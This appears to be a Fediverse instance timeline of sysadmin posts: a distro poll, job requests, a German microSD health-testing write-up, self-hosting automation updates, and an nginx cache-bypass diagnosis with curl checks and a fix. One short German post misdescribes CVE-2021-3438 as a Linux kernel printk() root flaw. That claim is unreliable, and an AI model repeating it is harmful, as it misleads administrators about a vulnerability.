social.dk-libre.fr is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.
This server runs the snac software and there is no automatic sign-up process.
Okay, Linux people riddle me this.
I gotta help another old laptop begging to be upgraded to Linux from Windows. The user is not TUI literate and would prefer GUI based interactions. It is a hybrid graphics setup, Intel + AMD.
What would you suggest? Remember stability over cutting edge features.
#askfedi #linux #sysadmin #linuxmint #ubuntu #arch #fedora #kde #gnome #xfce #programming #cybersecurity
| Fedora: | 6 |
| Mint: | 9 |
| Ubuntu: | 2 |
| (other - comment): | 6 |
I love it when technology lifts get so big and technical that they eclipse enterprise solutions and return to fundamentals. That's my game. I'm here for you when that happens. It will happen. 🤣
Also, it's always DNS.
Also too, it's never a better time to switch to Debian.
#sysadmin #greybeard #linux #unix #opensource #freesoftware #floss #selfhosted #smallbusiness #residential #consumer #consumergrade #gomindswithmeidareu #debian #fundamentals
2.5 Admins 313: Cooking with NVMe
Microsoft claims that Windows 11 will work well with 8GB of RAM, some of the innovations coming to high end SSDs, the arguments for TP-Link Omada over UniFi Ubiquiti.
No matter how much you hate #ai tools and what they represent, this video by Nate B Jones is worth watching if you want to be aware of what's going on in modern #computing: https://youtu.be/FCRT7M30Wtw
This type of agent behaviour has global implications we aren't on top of yet.
CVE-2021-3438 ist ein lokaler Privilegientrennungsfehler in der Linux-Kernel-Funktion `printk()`, der es lokalen Benutzern ermöglicht, beliebige Kernel-Logs zu schreiben und unter Umständen die Root-Shell zu erreichen. Der CVE wurde am 2021-05-04 veröffentlicht.
Die betroffenen Systeme sollten umgehend gepatcht werden.
#Linux #Kernsicherheit #CVE #Sysadmin
https://www.ctsd.de/insights/2026-08-technik-ki-schreibt-druckertreiber-was-steckt-dahinter.html
Computers are like onions. Everything is layers built on layers, and every layer makes you cry. #sysadmin
Fellow system administrators, what is the wonkiest system you've had to manage in your career?
#tech #sysadmin #technology #it #informationtechnology #systems #infrastructure #server
I'd like my next job to have something more than Linux, yes, I'm looking at your FreeBSD.
#runbsd #freebsd #getfedihired
↩ Ludovic Hirlimann :
"I can work in both French and English. I'm interested in infrastructure roles.
#infrastructure #sysadmin #sre"
[via Ponos] https://ponos.fr/thread/clf364ichbjbh9c9vb4nu8d4d
I can work in both French and English. I'm interested in infrastructure roles.
#infrastructure #sysadmin #sre
↩ Ludovic Hirlimann :
"I've been remote, fully since 2009 and would like to keep it that way.
[via Ponos] https://ponos.fr/thread/c615qh73u2fb87zc86iq7hk5z
Der #froscon Vortrag zu #curl von Christoph Stoettner ist sehr interessant! Ich wusste nicht, dass das Ding sooo viel kann. (Ich bin eine von denen, die bisher telnet nachinstalliert haben. 😄)
https://programm.froscon.org/froscon2026/talk/86a97c61-8362-40af-9934-821d04f08ccd/
Eine alte 8-GB-microSD-Karte lag noch in der Schublade, entbehrlich genug für einen Härtetest. Die Ausgangsfrage war simpel: ist die Karte noch gut, oder produziert sie im Hintergrund längst stille Fehler? Bei einer SSD würde ich smartctl -a tippen und hätte binnen Sekunden Health-Prozent, Reallocated Sectors und Power-On-Hours auf dem Schirm. Bei einer SD-Karte geht genau das nicht, und der Grund dafür ist interessanter als die fehlende Zahl selbst.
ATA- und NVMe-Laufwerke haben eine standardisierte SMART-Schnittstelle: fest definierte Attribute, die die Firmware selbst pflegt und die jedes Betriebssystem auf die gleiche Weise abfragen kann. SD-Karten haben nichts Vergleichbares. Der Flash-Controller auf der Karte übernimmt zwar Wear-Leveling und Bad-Block-Mapping, aber wie er das im Detail tut und was er darüber nach außen preisgibt, ist herstellerspezifisch und komplett verschlossen. Es gibt zwar eine SD Health Status Extension, CMD56-basiert, die unterstützt aber so gut wie kein Consumer-Werkzeug, und sie setzt einen nativen MMC-Host voraus, keinen USB-Kartenleser.
Ein Wort noch zu TRIM, bevor der Eindruck entsteht, SD-Karten hätten damit überhaupt nichts zu tun: der Linux-MMC-Stack unterstützt discard-artige Operationen für native mmcblk-Geräte durchaus. Nur bringt das über einen USB-Kartenleser nichts, weil die USB-Massenspeicher-Übersetzung diesen Pfad gar nicht durchreicht, das habe ich in diesem Test empirisch bestätigt. Und selbst auf einem nativen Host wäre das nur ein Erase-Hinweis an den Controller, keine standardisierte Health-Rückmeldung wie bei SSD-TRIM zusammen mit SMART.
Für den Test kam eine Transcend Premium 8GB microSDHC zum Einsatz, Class 10, UHS-Speed-Class U1, in einem Samsung-Adapter auf volle SD-Größe gesteckt und über einen UGREEN-USB-Kartenleser ausgelesen. Der Leser meldet sich per USB als Genesys-Logic-Chip (05e3:0748), ein generischer Combo-Reader, wie er auch in vielen Laptops und günstigen USB-Dongles verbaut ist. Host war ein Linux Mint 22.3 mit Kernel 7.0.0-28-generic, Ubuntu-24.04-Unterbau, alle Befehle liefen als root.
So kam die Karte beim Testsystem an: microSD im Samsung-Adapter, gesteckt in den UGREEN-USB-Kartenleser.
Bis auf badblocks, smartctl, hdparm und dd, die auf den meisten Systemen ohnehin vorhanden sind, kommt der Rest aus den Standard-Paketquellen, keine Drittanbieter-PPA nötig:
apt-get install -y f3 mmc-utils sdparm flashbench apt-get install -y fio # nachinstalliert, sobald der Schritt feststand
Installiert wurden f3 8.0, mmc-utils als Git-Snapshot von 2022, sdparm 1.12, flashbench 62 und fio 3.36, alles aus dem Ubuntu-Noble-Universe-Repository. Getestet auf Linux Mint 22.3, aber auf einem reinen Ubuntu 24.04 sollten Paketnamen und Versionen identisch sein.
$ smartctl -a /dev/sdc
/dev/sdc: Unknown USB bridge [0x05e3:0x0748 (0x1209)]
Please specify device type with the -d option.
$ smartctl -a -d sat /dev/sdc
Read Device Identity failed: scsi error unsupported scsi opcode
A mandatory SMART command failed: exiting.
$ smartctl --scan
/dev/nvme0 -d nvme
/dev/nvme1 -d nvme
# sdc taucht gar nicht erst auf, smartd hält es für keinen unterstützten Gerätetyp
$ sdparm -a /dev/sdc
MODE SENSE(10): Malformed SCSI command
/dev/sdc: Generic MassStorageClass 1209
$ sdparm -i /dev/sdc
/dev/sdc: Generic MassStorageClass 1209
Device identification VPD page:
Addressed logical unit:
designator type: T10 vendor identification, code set: ASCII
vendor id: Generic
vendor specific: STORAGE DEVICEsmartctl erkennt die Genesys-Logic-USB-Bridge gar nicht erst als unterstützten Gerätetyp. Erzwingt man SAT, also ATA-Kommandos über SCSI getunnelt, scheitert das vollständig, weil die Bridge-Firmware das Kommando schlicht nicht implementiert. Selbst der Geräte-Scan von smartd listet /dev/sdc gar nicht auf. sdparm kommt einen Schritt weiter, eine simple SCSI-INQUIRY funktioniert, aber die gemeldete Identität bleibt vollständig generisch: „Generic MassStorageClass“, „STORAGE DEVICE“. Weder Hersteller-ID noch Seriennummer noch irgendeine Form von Wear- oder Health-Daten sind über diesen Pfad erreichbar. Das ist der konkrete, reproduzierbare Beleg dafür, dass es für SD-Karten hinter einem USB-Leser kein SMART-Äquivalent gibt.
$ lsusb -v -d 05e3:0748
Bus 002 Device 007: ID 05e3:0748 Genesys Logic, Inc. All-in-One Cardreader
bcdUSB 3.10
idVendor 0x05e3 Genesys Logic, Inc.
idProduct 0x0748 All-in-One Cardreader
iSerial 5 000000001209
bInterfaceClass 8 Mass Storage
bInterfaceSubClass 6 SCSI
bInterfaceProtocol 80 Bulk-Only
SuperSpeed USB Device Capability:
wSpeedsSupported 0x000e (Full/High/SuperSpeed, bis zu 5Gbps Link)Der Leser meldet sich als „All-in-One Cardreader“ von Genesys Logic, ein verbreiteter generischer Combo-Chip, USB-3.1-fähig, spricht auf der SCSI-Ebene aber Bulk-Only Transport (BOT), nicht UAS. Wichtig für die Kausalität: BOT statt UAS ist für sich genommen nicht der Grund, warum SAT-Passthrough scheitert. Es gibt genug BOT-Bridges, die SAT unterstützen, und genug, die es nicht tun, unabhängig vom Transportprotokoll. Belegt ist hier nur, dass ausgerechnet diese Genesys-Bridge keine ATA- beziehungsweise SAT-Kommandos durchreicht, nicht dass USB-Bulk-Only-Bridges das grundsätzlich nicht könnten.
Der Aufdruck verrät mehr als jedes Software-Tool: Transcend Premium, 8GB, Class 10, UHS-Speed-Class U1.
hdparm -t allein ergab rund 90 MB/s gepuffertes Lesen, plausibel, aber es lohnt sich, mit echtem O_DIRECT-I/O gegenzuprüfen, damit keine Bridge- oder Seiten-Cache-Effekte den Wert verfälschen.
$ hdparm -Tt /dev/sdc Timing cached reads: 24182 MB in 2.00 seconds = 12113.48 MB/sec Timing buffered disk reads: 272 MB in 3.00 seconds = 90.66 MB/sec # 512MB Zufallsnutzlast zuerst im tmpfs erzeugt, damit die CPU-Last von # /dev/urandom die eigentliche Messung nicht verfälscht $ dd if=/dev/urandom of=/root/sdtest/payload.bin bs=1M count=512 536870912 Bytes (537 MB, 512 MiB) kopiert, 1,74754 s, 307 MB/s # SCHREIBEN: Direct I/O direkt auf das Rohgerät, kein Seiten-Cache beteiligt $ dd if=/root/sdtest/payload.bin of=/dev/sdc bs=1M count=512 oflag=direct,sync 536870912 Bytes (537 MB, 512 MiB) kopiert, 22,8654 s, 23,5 MB/s # LESEN: erst flushen, dann Direct I/O der gleichen 512MB zurück $ blockdev --flushbufs /dev/sdc $ dd if=/dev/sdc of=/root/sdtest/readback.bin bs=1M count=512 iflag=direct 536870912 Bytes (537 MB, 512 MiB) kopiert, 6,28156 s, 85,5 MB/s # Integritätscheck $ cmp /root/sdtest/payload.bin /root/sdtest/readback.bin MATCH: identical
Ergebnis: rund 23,5 MB/s sequenzielles Schreiben, rund 85,5 MB/s sequenzielles Lesen, mit byteidentischem Rücklese-Ergebnis. Die Asymmetrie zwischen Schreiben und Lesen ist normal und erwartbar, Schreiben braucht auf Flash-Ebene ein Erase-before-Program, Lesen nicht. 23,5 MB/s reißt die Class-10- und U1-Mindestangabe von 10 MB/s locker, für U3/V30 mit 30 MB/s Minimum würde es nicht reichen, was exakt zum aufgedruckten Rating der Karte passt: Class 10, U1, keine U3- oder V30-Kennzeichnung.
Bevor der große, langsame Test kommt, lohnt sich der schnelle: f3 (Fight Flash Fraud) bringt mit f3probe einen Kapazitätsbetrugs-Check, der binnen weniger Minuten läuft, statt die ganze Karte zu beschreiben.
$ f3probe --time-ops /dev/sdc
Probe finished, recovering blocks... Done
Good news: The device `/dev/sdc' is the real thing
Device geometry:
*Usable* size: 7.31 GB (15333376 blocks)
Announced size: 7.31 GB (15333376 blocks)
Module: 8.00 GB (2^33 Bytes)
Approximate cache size: 0.00 Byte (0 blocks), need-reset=no
Physical block size: 512.00 Byte (2^9 Bytes)
Probe time: 1'46"
Operation: total time / count = avg time
Read: 29.32s / 4197116 = 6us
Write: 1'15" / 4192321 = 18us
Reset: 0us / 1 = 0usVerdikt: eine echte Karte, keine Fälschung. Die angekündigte Größe, 8-GB-Modul mit 7,31 GB nutzbar, deckt sich mit der tatsächlich nutzbaren Größe, die f3probe per binärer Suche gefunden hat, also dort, wo Schreibvorgänge aufhören, korrekt anzukommen. Approximate cache size: 0.00 Byte ist ebenfalls ein gutes Zeichen: manche gefälschten Karten täuschen ihre Kapazität vor, indem sie eine kleine Menge echten Flashs als Write-Back-Cache benutzen, der Schreibvorgänge über die tatsächliche Kapazität hinaus vorübergehend „schluckt“ und damit naive Benchmarks täuscht. Diese Karte zeigt diesen Trick nicht. f3probe hat die für die Prüfung benutzten Blöcke danach wiederhergestellt, ohne -n gestartet, die Karte blieb also in ihrem vorherigen, leeren Zustand. Reine Probe-Zeit rund 1:46 Minuten, mit Block-Wiederherstellung insgesamt rund 3 Minuten, deutlich schneller als ein vollständiger Schreib-Lese-Durchlauf, weil f3probe gezielt sucht statt jeden Block anzufassen.
$ wipefs -a /dev/sdc
$ parted -s /dev/sdc mklabel gpt mkpart primary ext4 0% 100%
$ mkfs.ext4 -F -L SDTEST /dev/sdc1
$ mount /dev/sdc1 /mnt/sdtest
$ df -h /mnt/sdtest
/dev/sdc1 7,2G 24K 6,8G 1% /mnt/sdtest
$ cd /mnt/sdtest && f3write .
Free space: 7.10 GB
Creating file 1.h2w ... OK!
...
Creating file 8.h2w ... OK!
Free space: 16.46 MB
Average writing speed: 22.78 MB/s
$ f3read .
SECTORS ok/corrupted/changed/overwritten
Validating file 1.h2w ... 2097152/ 0/ 0/ 0
...
Validating file 8.h2w ... 176128/ 0/ 0/ 0
Data OK: 7.08 GB (14856192 sectors)
Data LOST: 0.00 Byte (0 sectors)
Corrupted: 0.00 Byte (0 sectors)
Slightly changed: 0.00 Byte (0 sectors)
Overwritten: 0.00 Byte (0 sectors)
Average reading speed: 90.32 MB/sVerdikt: sauber. Jedes Byte jeder der 8 Testdateien, 7,08 GB insgesamt, bis auf rund 16 MB Restplatz gefüllt, kam exakt so zurück, wie es geschrieben wurde: 0 korrupte, 0 veränderte, 0 überschriebene Sektoren. Die gemessenen Geschwindigkeiten, 22,78 MB/s Schreiben und 90,32 MB/s Lesen, decken sich eng mit dem rohen dd-Direct-I/O-Benchmark aus Schritt 2, eine gute Gegenprobe, dass die Zahlen echt sind und kein Artefakt einer einzelnen Methode.
$ umount /mnt/sdtest $ badblocks -wsv /dev/sdc Es wird nach defekten Blöcken gesucht (Lesen+Schreiben-Modus) Von Block 0 bis 7666687 Es wird getestet Mit Muster 0xaa: ... 100% erledigt Es wird getestet Mit Muster 0x55: ... 100% erledigt Es wird getestet Mit Muster 0xff: ... 100% erledigt Es wird getestet Mit Muster 0x00: ... 100% erledigt Durchgang beendet, 0 defekte Blöcke gefunden. (0/0/0 Fehler)
Verdikt: 0 defekte Blöcke, über alle 4 Standard-Testmuster hinweg (0xAA/01010101, 0x55/10101010, 0xFF/lauter Einsen, 0x00/lauter Nullen, gewählt, um Stuck-at-0- und Stuck-at-1-Zellfehler ebenso wie Kopplungsfehler zwischen Nachbarbits zu erwischen). Gesamtlaufzeit für den kompletten Schreib-Lese-Vergleichs-Zyklus über alle 4 Muster: rund 26 Minuten 47 Sekunden auf dieser 7,31-GiB-Karte, was zur Schätzung von rund 27 Minuten aus den früheren Durchsatzwerten passt, 4-mal Schreibdurchlauf plus Lesedurchlauf bei rund 23,5/85 MB/s.
badblocks -w ist ein linearer, positionsbasierter Test, Teil von e2fsprogs. In einem Durchgang schreibt er dasselbe Muster auf jeden logischen Block und liest es zurück. Genau das ist der strukturelle Unterschied zu f3write/f3read, und der Grund, warum badblocks kein Ersatz für f3 bei der Kapazitätsbetrugsfrage ist: eine Karte, die Schreibvorgänge still auf einen kleineren physischen Bereich zurückführt, könnte in einem badblocks-Durchgang trotzdem das „richtige“ Muster zurückliefern, weil ohnehin jeder logische Block identischen Inhalt bekommt, das Aliasing bliebe unsichtbar. f3write vermeidet das, indem es positionsabhängige Pseudozufallsdaten schreibt, sodass Wraparound oder Aliasing als Mismatch auffällt. badblocks beantwortet dafür eine engere, ergänzende Frage: versagen bestimmte Blöcke oder Zellen dabei, irgendein Muster zuverlässig zu speichern, was der einmalige, pseudozufällige Schreibdurchgang von f3 pro Karte nicht so systematisch prüft, kein 0xAA/0x55/0xFF/0x00-Stuck-Bit-Sweep.
$ flashbench -f -o /root/sdtest/flashbench.out /dev/sdc $ cat /root/sdtest/flashbench.out 4MiB 28.5M/s 28.3M/s 26.7M/s 27.6M/s 23.4M/s 28M/s 2MiB 26.6M/s 28.2M/s 26.7M/s 28.1M/s 26.8M/s 28.1M/s 1MiB 26.6M/s 28.8M/s 26.4M/s 28.4M/s 26.6M/s 27.3M/s 512KiB 26.7M/s 28.2M/s 26.9M/s 28.9M/s 26.8M/s 28.3M/s 256KiB 26.7M/s 28.2M/s 26.6M/s 27.8M/s 27M/s 28.8M/s 128KiB 26M/s 28.5M/s 26.7M/s 28.3M/s 26.8M/s 28.3M/s 64KiB 26.9M/s 28.8M/s 26.8M/s 28.3M/s 26.7M/s 27.9M/s 32KiB 12.6M/s 12.7M/s 13.1M/s 12.6M/s 12.9M/s 12.8M/s 16KiB 5.78M/s 5.91M/s 5.87M/s 5.82M/s 5.82M/s 5.86M/s
flashbench -f (find-fat) liest am Ende der ersten paar Erase-Blöcke zunehmend kleinere Häppchen und misst die Zeit dafür, auf der Suche nach dem Punkt, an dem die Lesegeschwindigkeit plötzlich einbricht. Die Grundidee: das deutet auf die interne Lese- beziehungsweise Page-Granularität des Flashs hin, weil das Lesen eines Teils einer internen Page oder eines Blocks genauso viel kosten kann wie das Lesen der ganzen Einheit, sub-granulare Reads verschwenden dann Bandbreite. Hier hält sich das Plateau, rund 26 bis 29 MB/s, passend zum rohen sequenziellen Lese-Benchmark, stabil bis hinunter zu 64 KiB, bricht dann bei 32 KiB auf weniger als die Hälfte ein (rund 12,6 bis 13,1 MB/s) und nochmal auf etwa ein Fünftel bei 16 KiB (rund 5,8 bis 5,9 MB/s). Ein sauberes, reproduzierbares Signal, 6 Wiederholungen pro Zeile, alle konsistent.
Die Schlussfolgerung bleibt bewusst vorsichtig formuliert: das ist ein Performance-Knick bei 64 KiB auf diesem konkreten Reader-Controller-Pfad, konsistent mit einer größeren internen Leseeinheit oder FTL-Gruppierung, aber keine direkte, verifizierte Messung der tatsächlichen physischen NAND-Page-Größe der Karte (typischerweise 8 bis 16 KiB, dafür bräuchte es Herstellerdokumentation oder eine andere Messmethode). Die Daten sind mit einer bestimmten Erklärung konsistent, sie beweisen sie nicht.
dd und f3write liefern Durchschnittswerte. fio mit einem Bandbreiten-Log pro Sekunde zeigt dagegen die Form des Schreibvorgangs über die vollen 6 GB, genau das will man sehen, wenn man einen Pseudo-SLC-Cache-Absturz sucht: viele Karten schreiben schnell in einen kleinen SLC-Modus-Puffer, bis der voll ist, und fallen danach auf eine deutlich niedrigere TLC- oder QLC-Dauerschreibrate ab.
$ fio --name=sdcard-write --filename=/dev/sdc --rw=write --bs=1M --size=6G --direct=1 --ioengine=psync --iodepth=1 --write_bw_log=/root/sdtest/fio_write --log_avg_msec=1000 --group_reporting write: IOPS=26, BW=26.0MiB/s (27.3MB/s)(6144MiB/236179msec) bw (KiB/s): min=24576, max=27675, per=100.00%, avg=26645.27, stdev=457.38, samples=236
Der Blick ins rohe Sekunden-Log lohnt sich, nicht nur die Zusammenfassung: 236 Einsekunden-Stichproben über den kompletten 6-GB-Schreibvorgang, alle im Bereich von 24576 bis 27675 KiB/s, also rund 24,0 bis 27,0 MB/s. Erste und letzte Stichprobe liegen im selben schmalen Band, kein erhöhter Burst am Anfang, kein Absturz später.
Verdikt: flach, kein erkennbarer SLC-Cache-Absturz auf dieser Karte. Auch hier lohnt sich die vorsichtige Formulierung: das beweist nicht, dass die Karte null Schreibpufferung hat, nur dass ein eventueller Puffer beziehungsweise Absturz innerhalb dieses 6-GB-Testfensters auf einer Karte mit nur rund 7,3 GB nutzbarer Gesamtkapazität nicht sichtbar wurde. Es könnte schlicht nicht genug Karte nach dem Puffer übrig sein, um einen Absturz zu zeigen, oder, wahrscheinlicher bei einer reinen Class-10/U1-Budgetkarte ohne A1/A2- oder „Extreme/Pro“-Einstufung, sie implementiert gar kein dynamisches SLC-Caching. So oder so steht das praktische Ergebnis: die Schreibleistung war über die gesamte Kapazität konsistent und vorhersagbar, nicht nach vorne verlagert.
Ein paar Dinge, die in diesem Testlauf nicht zum Einsatz kamen, aber der Vollständigkeit halber dazugehören. mmc extcsd read und seine Lebensdauer-Schätzfelder, das Nächste an einer echten Health-Prozentangabe in diesem Umfeld, sind eine eMMC-Eigenschaft. Eine wechselbare SD- oder microSD-Karte ist kein eMMC, dieser Pfad stand hier ohnehin nicht zur Verfügung, USB-Leser statt nativer MMC-Host. Ein nativer MMC-Host-Slot, etwa der eingebaute SD-Slot eines Laptops, würde dagegen mehr Identitätsdaten offenlegen als ein USB-Leser: /sys/block/mmcblkX/device/ mit cid, csd, scr, serial, manfid, name, oemid, preferred_erase_size und date, der Kernel parst die Identitätsregister der Karte direkt in sysfs, ganz ohne Zusatzwerkzeug. Wer also einen echten SD/MMC-Controller statt einer USB-SCSI-Bridge als Leser hat, bekommt das gratis dazu, in diesem Test war davon nichts erreichbar.
Und noch ein Missverständnis vorweg: der „SD Card Formatter“ der SD Association ist ein Formatierungs- und Reset-Werkzeug, das die werkseitige Partitionierung wiederherstellt, nachdem andere Betriebssysteme sie durcheinandergebracht haben, kein Health-Check-Werkzeug.
Vom schnellsten und harmlosesten zum langsamsten und gründlichsten, ungefähr so, wie dieser Test auch abgelaufen ist:
lsusb -v, udevadm info, dmesg. Leser und Karte identifizieren, Schreibschutz-Status vorab prüfen.smartctl -a -d sat und sdparm -a. Schneller, harmloser Versuch an Health- und Identitätsdaten, meist scheitert das über einen USB-Leser, und genau dieses Scheitern ist der Punkt, den man erklären sollte.f3probe. Schneller Kapazitätsbetrugs-Check, für 8 GB etwa 2 bis 3 Minuten, minimal destruktiv, stellt die benutzten Blöcke standardmäßig wieder her.f3write plus f3read. Der Haupttest, vollständige Schreib-Lese-Integritätsprüfung über die gesamte Kapazität, braucht ein Dateisystem.badblocks -w. Destruktive Vier-Muster-Prüfung auf defekte Blöcke, Rohgerät, kein Dateisystem nötig. Fängt Dinge, die f3 strukturell nicht kann, siehe Schritt 5.dd mit oflag/iflag=direct und/oder fio mit Bandbreiten-Log. Durchsatzzahlen und, mit fio, die Form der Schreibrate über die Zeit.flashbench -f -o DATEI. Optional, für die Neugier, Hinweise auf die interne Lese-Granularität.Für diese konkrete Karte: gesund, echt, keine Defekte gefunden, bei jedem Test, der überhaupt in der Lage gewesen wäre, welche zu finden. Keine SMART-Werte erreichbar über den USB-Leser, echte Kapazität ohne Cache-Trickserei, null Datenkorruption über 7,08 GB, null defekte Blöcke über alle 4 Muster, rund 23 bis 27 MB/s Schreiben und rund 85 bis 90 MB/s Lesen, konsistent über vier unabhängige Messmethoden, kein SLC-Cache-Absturz über die volle Kapazität. Die Karte reißt ihre aufgedruckte Class-10/U1-Angabe locker, für U3/V30 würde es nicht reichen, was sie auch gar nicht behauptet.
Der eigentliche Punkt reicht über diese eine Karte hinaus: ohne SMART bleibt nur Verhaltenstestung statt Register-Abfrage. Schreiben, lesen, vergleichen, und der Karte dabei zusehen, statt sie nach einer Zahl zu fragen, die sie gar nicht hat.
Falls jemand einen zuverlässigeren Weg zur Health-Einschätzung einer SD-Karte unter Linux kennt, immer her damit. Und falls ihr selbst öfter mit fragwürdigen Billigkarten zu tun habt, dürft ihr mich zu dem Thema sehr gerne fragen.
Hi, guys, please recommend me a free DNS hosting service that:
* is reliable
* has a free tier
* EU or Europe-based organization, or has nodes on the continent
* good for super-low-traffic, mission-critical websites
* DNSSEC support is obligatory
* is not CloudFlare
Thanks!
Apparemment en créant une clé bootable je me suis trompé de disque (pourtant il me semblait avoir vérifié plusieurs fois ?) et j'ai donc fait un dd d'une ISO de 7 Go sur le SSD chiffré qui contient mon système et mon /home.
Est-ce qu'il y a un moyen de récupérer le système ou au moins mes données ?
(je crains que non, hélas)
(je crois que j'avais sauvegardé mes headers LUKS mais aucune idée d'où)
In my last blog post I said I really don’t need any more peers for AS201379.
Then @reulnl showed up with: “Hey, want a connection to Piter-IX?”
Obviously, the correct sysadmin response was: yes.
So here we are: 10 peers now. Including one via LowPing.nl going straight to Piter-IX. 😅
At this point, “I should stop growing the network” has roughly the same credibility as “this is the last server I’m buying.”
Envoi d'un signal de mise sous tension pour tout faire repartir au propre.
À 4h07, Uptime-Kuma confirme : tout est repassé au vert ! 🟢
#Proxmox #Nextcloud #SysAdmin #Automation #SelfHosted #Gotify
À 3h31, juste après Mastodon et avant le grand reboot de 4h, c'est au tour de PeerTube d'avoir son nettoyage automatique : « ✅ PeerTube Cleanup TERMINÉ » sur docker-peertube.
Purge des caches, ménage des fichiers temp et des médias fédérés. Au réveil, tout est propre sans avoir levé le petit doigt !
#PeerTube #SelfHosted #SysAdmin #Automation #Gotify
Décidément, la nuit réserve plein de surprises ! 🌙😜
À 3h18 du matin, Gotify repasse par là : « ✅ Mastodon Cleanup TERMINÉ » sur le conteneur docker-mastodon.
Un petit coup de balai automatique sur le cache et les médias distants pendant que tout le monde dort. Quand ton infra est plus disciplinée que toi ! 🧹🐘✨
#Mastodon #SysAdmin #Linux #Automation #SelfHosted #Gotify #Proxmox
Quand tu automatises tellement tout que tu en oublies tes propres scripts ! 😅
À 23h pile, notification Gotify : purge massive et nettoyage de /var/log sur tous les nœuds du cluster Proxmox (purge_logs.sh).
Le moment exact où tu te dis : « Ah oui c'est vrai, j'avais écrit un script pour ça ! » 😂
C'est ça, la vraie magie d'un système qui tourne en totale autonomie !
#SysAdmin #Proxmox #Linux #Automation #Bash #Gotify #SelfHosted
Pour voir la capture en bonne résolution, rendez-vous sur Picsur : https://picsur.blablalinux.be/i/d41a86aa-eefa-41f5-8858-b5c6d695f04c.jpg
Fin du marathon d'automatisation. Bon week-end à tous !
Last night mementomori.social got a bit slow. Not terrible, but noticeable. Load average hit 26 on 8 cores and page loads took several seconds. The cause was an nginx caching failure I had not run into before, so I am writing it down.
A crawler was hitting us from about 1500 IPs in a Singapore datacenter range. The problem was the requests sent bogus "Authorization: Basic" headers with every request.
Mastodon answers several public API endpoints with "Vary: Authorization". That is correct, since the response differs for logged in and anonymous callers. But nginx honors Vary, so a request carrying an Authorization header is a different cache entry than one without it. On our setup every distinct header value got its own entry. Each crawler request produced a cache key nobody had ever asked for, missed, and went straight through to Puma, uncached. Oof.
This was difficult to spot. Request volume looked normal for a social media server, PostgreSQL was idle, and nothing in the logs screamed "overload, overload!". The cache just stopped working on the busiest endpoints and the app servers took the whole load.
You can check your own instance in a few seconds. First without an Authorization header:
```
curl -sI https://your.instance/api/v1/trends/tags
```
Then the same request with a junk header:
```
curl -sI -H "Authorization: Basic dGVzdDp4" https://your.instance/api/v1/trends/tags
```
X-Cached only appears if you have `add_header X-Cached $upstream_cache_status` in your config, which is worth adding. Otherwise watch Age. I tried this against a few other instances and the pattern holds: without the header you get a cache hit, with it you do not.
The fix is one rule. Mastodon uses OAuth Bearer tokens and federation uses HTTP Signatures. Basic auth is never used, so any Basic header is bogus and can be rejected at the edge for no upstream cost:
```
location @proxy {
if ($http_authorization ~* "^Basic") { return 401; }
...
}
```
Check it before trusting it and always test the config for typos `sudo nginx -t` before restarting and crashing your services. Real Bearer tokens still 200, anonymous browsing still 200, POST /inbox still reaches Mastodon, and preview bots (Mastodon, Slack, Discord, Telegram, WhatsApp, facebookexternalhit) all still 200. Load went from 26 to normal (under 6 usually for our busy server) and CPU idle from 1.4 percent to 34 percent.
What actually identified this as automated was not request volume, which looks like normal browsing. In 57 minutes that one range fetched 1722 distinct hashtags. Everyone else on the instance, about a thousand real users plus all federation, fetched 1353. But one IP range went through more hashtags than the entire rest of the server, which is telling.
We now log $upstream_cache_status and $request_time to a separate file, so next time this is a ten second check instead of an hour of guessing.
If your instance feels slow and your database is idle, check your cache hit rate before you scale anything.
#MastoAdmin #SysOp #SysOps #SysAdmin #mementoMoriSocial #Nginx
Some services will be momentarily down today while we migrate from Dynadot to Dreamhost for our domain Registrar. Moving forward, all DNS will be managed at Hurricane Electric and/or Dreamhost. Thanks for patience 🙏🏼
This sudden change was due to Dynadot changing their subdomain record policy from 250 to 50 without notice. This caused a week-long disruption in building out new services due to any record over the cap being irrecoverable once deleted and new ones being impossible to create. Despite having 150+ records in the past, Dynadot responded that they've never supported more than 150 and would only restore that.
Both the change in terms and contract without notice and the dishonesty once a ticket was filed serve as sufficient reasons to ditch Dynadot. This was surprising to say the least. They've been a solid Registrar. As for DNS, we only used it the last three years having originally used afraid.org for over a decade. Ultimately, this is for the best however, because it is always unwise to keep one's DNS and Registrar at the same host. Hurricane Electric's DNS is additionally a breath of fresh air from 1998-2002 era and so easy to use - the alphabetical rendering of records amazing 🤩
It's always DNS !!
📊 La liste complète des conteneurs est visible ici : https://picsur.blablalinux.be/i/f8bcd804-76b7-4359-a8d7-feb276dd5a21.jpg
Un rapide passage à 512 Mo de RAM, et le problème est réglé. C'est aussi ça la magie du monitoring et des scripts auto : repérer les petits goulots d'étranglement en un clin d'œil ! ☕️💪
C'est samedi, jour de l'automatisation sur le cluster Proxmox ! ⚙️
La première tâche s'est lancée à 10h pile et s'est terminée 11 minutes plus tard : 3 VM mises à jour en douceur (PBS, Elasticsearch et Jitsi Meet, bien identifiables en bleu sur la capture) et aucun redémarrage nécessaire. Tout roule tout seul pendant que je peux profiter de mon café ! ☕️
Et chez vous, ça automatise aussi le week-end ou c'est tout à la main ? 🛠️
#Proxmox #SysAdmin #Linux #SelfHosted #Automation #DevOps
@mboelen "A #Sysadmin's #Unixersal Translator (ROSETTA STONE) OR What do they call that in this world?" #unix
https://bhami.com/rosetta.html
Advice for upcomming #UnixAdmins #Unix =/= #Linux tho very close xD
In less than 12hrs I'll be taking graduates of the Tunnel training into another edition of Fortress. 4x6hrs, followed by 2 weeks of supported service deployments and experimentation.
I'm excited about every part of it (esp to see what participants build up), except the 1am starts, in my, umm, challenging timezone.
It'll be coffee black as midnight for a bit.
Anybody any news on DNS-PERSIST-01? It would allow me to simplify some things massively, once it's available…
https://letsencrypt.org/2026/02/18/dns-persist-01
Hi everyone, my husband Craig is currently looking for a new job. Please feel free to boost this post for me 💐
"I'm open for sysadmin, devops, SRE, or general coding work, at any level. Prefer to work *with* opensource, and in an ideal world *on* opensource, but work is work. Nearly 3 decades of experience across development and systems, from the tiny to the large (most recently GitLab). Permanent or contract is fine, working (remote) from Dunedin."
CV at https://www.stroppykitten.com/static/Craig-CV.pdf
Email: craig@stroppykitten.com
#GetFediContracted #GetFediHired #FediHire #fedijobs #remotejob #jobsearch #job #RemoteJobs #sre #devops #sysadmin #opensource
There is a person I've been helping for a while who runs two instances, one #GoToSocial and one #snac.
